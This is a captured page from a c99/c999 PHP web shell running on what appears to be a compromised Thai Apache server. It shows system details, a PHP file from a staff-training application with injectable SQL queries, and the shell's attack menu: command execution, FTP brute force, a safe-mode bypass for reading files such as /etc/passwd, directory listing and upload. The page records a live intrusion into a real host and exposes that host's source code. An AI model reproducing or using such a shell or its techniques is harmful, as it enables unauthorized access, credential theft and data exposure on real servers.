!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/develop_person_depart/   drwxr-xr-x
Free 52.65 GB of 127.8 GB (41.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ExcelreDev_10.php (17.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
";
		echo "

กรุณาทำการ Login ก่อน
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		 header('Content-type: application/xls');
         header('Content-Disposition: attachment; filename="Report.xls"');
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../includes/Function.php" );
		
		/**  Create Database Object  */
		$dbObj = new DBConn;
		
		//=== SESSION
		$Username = $valid_user; 
		
		
		/**  Config Table for This Page  */
		$myTable1 = "personal_tb";
		$myTable2PK = "tt.Training_code  ";
		
		
		
		
		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
		
		/**  จำนวนข้อมูล ต่อ 1 หน้า  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 1000; }
		
	$param = "Year_std=$Year_std&Training_std=$Training_std";			
	} # else
 ?>




งานพัฒนาบุคลากร








  

    
      execQuery($query);
		       $numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		if( isset($_GET['OrderBy']) ) {
			$query = " SELECT *  FROM  personal_tb pt,  training_tb tt   Where   pt.StatusId='1'  and   pt.Teacher_code = tt.Teacher_code   and   tt.Year_std='$Year_std'   and  tt.Training_std='Y'   Group   By   pt.Teacher_code    ORDER BY $OrderBy $ASCDESC ";
		} 
		elseif( !isset($_GET['OrderBy']) ) {
			$query = " SELECT *  FROM personal_tb pt,  training_tb tt   Where   pt.StatusId='1'  and   pt.Teacher_code = tt.Teacher_code   and   tt.Year_std='$Year_std'   and  tt.Training_std='Y'   Group   By   pt.Teacher_code     ORDER BY $myTable2PK DESC ";
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
    ?>
      
        

          

            

               
            

            

               0 ) { ?>
                fetchArray($result) ) { 
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
          ?>
                  freeresult($result);
          ?>
                

                  

                     
                     
                    วันที่
                    จำนวน 

                      หลักสูตร		
                    จำนวน 
ชั่วโมง		
                    จำนวน
วัน		
                    แหล่งเงินงบประมาณ
                  

                  

                    No.
                    รายการ
                    เงินงบ 
ประมาณ		
                    เงินรายได้
                    เงินหน่วย 
งานผู้จัด		
                    เงินอื่นๆ
                  

                  

                    
                    
                     
                    
                      execQuery($query); 
				$rs1 = $dbObj->fetchArray($result1);
				$num1 = $dbObj->_numrows;
				if( $num1 > 0 ) {
					echo $num1;
				} else {
					echo "0";
				}
          ?>
                    
                     
                    execQuery($query6);
				$rs6 = $dbObj->fetchArray($result6);
				$dbObj->freeresult($rs6);
					echo   number_format($rs6['Sum'])  ;
			?>
                     
			   
                    
                    
                    
                    
                  

                  
                  

                     
                    
                    
                      
-

                   
                     
                     
                    execQuery($query6);
				$rs6 = $dbObj->fetchArray($result6);
				$dbObj->freeresult($rs6);
					echo   number_format($rs6['Sum'])  ;
			?>
                    
                    
                    
                    
                    
                  

                  
                  

                
                

                  

                     0 ) { ?>
                      

                        

                          
                        

                        

                          หน้า:
                             1) {	
                            $previous = $display - 1;					
                    ?>
                            
bool(false)




:: Command execute ::


Enter:  
Select: 
 






:: Shadow's tricks :D  ::



  

    
Useful Commands 
    

    

      

        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 

    

    

  

   
Kernel Info: 

      
      
	  
	  
	  
	  
    

    







:: Preddy's tricks :D  ::



  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      

    

    

  

   
Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    

    








 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ ok ]






:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]


:: Go Dir ::
 
:: Go File ::
 


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--